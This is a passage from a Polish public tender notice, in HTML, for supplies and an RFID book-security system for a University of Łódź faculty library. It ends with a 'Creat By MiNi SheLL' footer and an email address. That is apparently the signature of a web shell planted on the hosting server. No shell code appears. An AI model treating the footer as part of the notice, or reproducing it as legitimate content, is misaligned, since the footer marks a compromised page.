3.3Dostawa  przedmiotu zamówienia obejmuje również dostawę niezbędnych do pracy, pełnowartościowych, fabrycznie nowych, oryginalnych i nieregenerowanych materiałów eksploatacyjnych zalecanych przez producenta sprzętu( Zamawiający nie dopuszcza oferowania materiałów eksploatacyjnych tzw. startowych).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 32.20.00.00-5, 32.20.00.00-5, 32.44.00.00-9, 32.42.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 10.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa i instalacja elektronicznego zabezpieczenia zbiorów bibliotecznych w technologii radiowej identyfikacji - RFID dla Wydziału Nauk Geograficznych Uniwersytetu Łódzkiego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest dostawa i  instalacja systemu elektronicznego zabezpieczenia zbiorów bibliotecznych w technologii radiowej identyfikacji - RFID , który ma pracować w oparciu o technologię RFID (Radio Frequency Identification - identyfikacji za pomocą fal radiowych) w częstotliwości przeznaczonej do tego typu zastosowań - 13.56MHz.
2.Pełna lista przedmiotów składających się na niniejsze zamówienie zamieszczona jest w Arkuszu kalkulacyjnym stanowiącym załącznik nr  1  do niniejszej specyfikacji.
Dostawa obejmuje sprzęt fabrycznie nowy. 
3. Oferowany system RFID musi być zgodny z normami obowiązującymi w Unii Europejskiej. Urządzenia muszą posiadać niezbędne certyfikaty zgodności z normą CE.4.technologia RFID ma służyć do realizowania wszystkich funkcji systemu  taki jak :
-	identyfikacja zbiorów bibliotecznych,
-	Informacja sieciowa jest przygotowana  i użytkowana przez system Windows , dlatego zatem opisując Zamawiający system operacyjny używa znaku towarowego Windows.

-	ochrona zbiorów bibliotecznych przed niekontrolowanym i bezprawnym ich wyniesieniem
poza teren chroniony,
-	obsługowe i samoobsługowe wypożyczenia i zwroty zbiorów bibliotecznych,
-	kodowanie etykiet RFID, przyjmowanie nowych książek /kodowanie/
-	porządkowanie i kontrola księgozbioru,
-	skontrum księgozbioru
-	administrowanie systemem RFID
System RFID musi być w pełni zintegrowany ze stosowanym obecnie w bibliotece zautomatyzowanym systemem bibliotecznym Horizon, zwanym dalej systemem bibliotecznym. 
5. Komunikacja z systemem bibliotecznym ma odbywać się z wykorzystaniem protokołu SIP2. System RFID musi korzystać z danych przechowywanych w systemie bibliotecznym bez konieczności ich replikacji. Dotyczy to zarówno danych dotyczących zbiorów bibliotecznych, jak i danych dotyczących różnych kategorii użytkowników systemu, w tym ich uprawnień. W przypadku braku uprawnień do wykonywania operacji w systemie bibliotecznym system RFID musi informować użytkownika za pomocą stosownych komunikatów wizualnych i dźwiękowych.
3.3Dostawa  przedmiotu zamówienia obejmuje również dostawę niezbędnych do pracy, pełnowartościowych, fabrycznie nowych, oryginalnych i nieregenerowanych materiałów eksploatacyjnych zalecanych przez producenta sprzętu( Zamawiający nie dopuszcza oferowania materiałów eksploatacyjnych tzw. startowych).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 32.20.00.00-5, 32.20.00.00-5, 32.44.00.00-9, 32.40.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com